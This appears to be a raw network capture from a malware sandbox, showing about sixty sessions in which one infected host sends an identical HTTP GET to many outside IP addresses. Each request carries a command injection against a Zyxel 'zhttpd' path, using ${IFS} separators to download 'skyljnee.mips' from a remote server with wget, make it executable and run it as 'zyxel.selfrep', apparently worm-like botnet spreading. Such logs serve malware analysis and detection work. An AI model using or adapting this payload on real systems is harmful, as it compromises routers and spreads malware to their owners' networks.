                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            180192.168.2.1334642184.187.156.98443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:03.427599907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            181192.168.2.1346070162.205.244.18443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:03.427644968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            182192.168.2.1333696161.67.171.242443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:03.427696943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            183192.168.2.1341780112.160.254.56443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:03.427758932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            184192.168.2.134668425.153.22.164443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:03.427772999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            185192.168.2.135511269.220.173.123443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:03.427920103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            186192.168.2.1351784164.2.81.26443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:03.427957058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            187192.168.2.1353580184.174.27.61443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:03.428035021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            188192.168.2.13380702.97.11.89443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:03.428075075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            189192.168.2.134875089.47.33.76443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431514025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            190192.168.2.135540457.64.26.85443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431550026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            191192.168.2.1348672158.209.193.119443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431581974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            192192.168.2.1359592213.17.3.253443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431623936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            193192.168.2.1336798113.125.196.179443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431660891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            194192.168.2.135093693.91.245.94443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431678057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            195192.168.2.1352590221.68.175.96443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431704044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            196192.168.2.135138267.255.108.130443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431724072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            197192.168.2.134122477.106.121.212443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431771994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            198192.168.2.1348466126.93.131.66443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431884050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            199192.168.2.1356198157.218.234.152443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431884050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            200192.168.2.1335404216.117.39.54443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431884050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            201192.168.2.1347254150.231.28.72443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431920052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            202192.168.2.1357830126.57.222.74443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431926966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            203192.168.2.1342044128.203.67.70443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431961060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            204192.168.2.135247696.77.90.161443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431983948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            205192.168.2.134780070.248.20.87443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431983948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            206192.168.2.1336424145.244.73.42443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.431983948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            207192.168.2.133303673.177.144.14443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.432018042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            208192.168.2.134225262.229.253.32443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.432040930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            209192.168.2.1355388183.91.196.228443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.432068110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            210192.168.2.135123277.22.152.220443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.432107925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            211192.168.2.134036441.131.180.216443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.432138920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            212192.168.2.1360526216.214.108.155443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.432183027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            213192.168.2.134015835.207.255.199443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.432187080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            214192.168.2.1333020156.148.134.189443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.432219028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            215192.168.2.1354686130.144.49.217443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.432488918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            216192.168.2.1355658191.211.41.95443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.432535887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            217192.168.2.1359918199.62.165.65443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.432581902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            218192.168.2.1343312157.161.189.55443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:04.432622910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            219192.168.2.133306846.16.159.161443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:05.435403109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            220192.168.2.1350458162.37.150.72443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:05.435444117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            221192.168.2.13389568.121.112.216443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:05.435470104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            222192.168.2.1345864122.243.133.220443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:05.435502052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            223192.168.2.134705482.92.102.89443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:05.435539961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            224192.168.2.1353084220.251.52.234443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:05.435570002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            225192.168.2.1355782202.134.77.49443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:05.435606003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            226192.168.2.1333250176.84.183.245443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:05.435703039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            227192.168.2.1358190173.97.82.212443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:05.435730934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            228192.168.2.133577837.18.119.20443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:06.439069033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            229192.168.2.1350180193.28.201.99443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:06.439114094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            230192.168.2.133378085.32.146.160443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:06.439173937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            231192.168.2.1354726207.12.100.16443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:06.439187050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            232192.168.2.1358036166.50.159.72443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:06.439281940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            233192.168.2.135439841.237.7.39443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:06.439321041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            234192.168.2.1347562151.89.96.144443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:06.439404964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            235192.168.2.135199495.16.87.196443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:06.439408064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            236192.168.2.1350954198.107.228.37443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.442861080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            237192.168.2.1342528134.121.119.60443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.442883015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            238192.168.2.1353394157.38.179.8443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.442928076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            239192.168.2.1334158154.185.170.213443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.442945957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            240192.168.2.1346206162.171.14.27443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.442996979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            241192.168.2.1341254108.112.159.246443
                                                            TimestampBytes transferredDirectionData
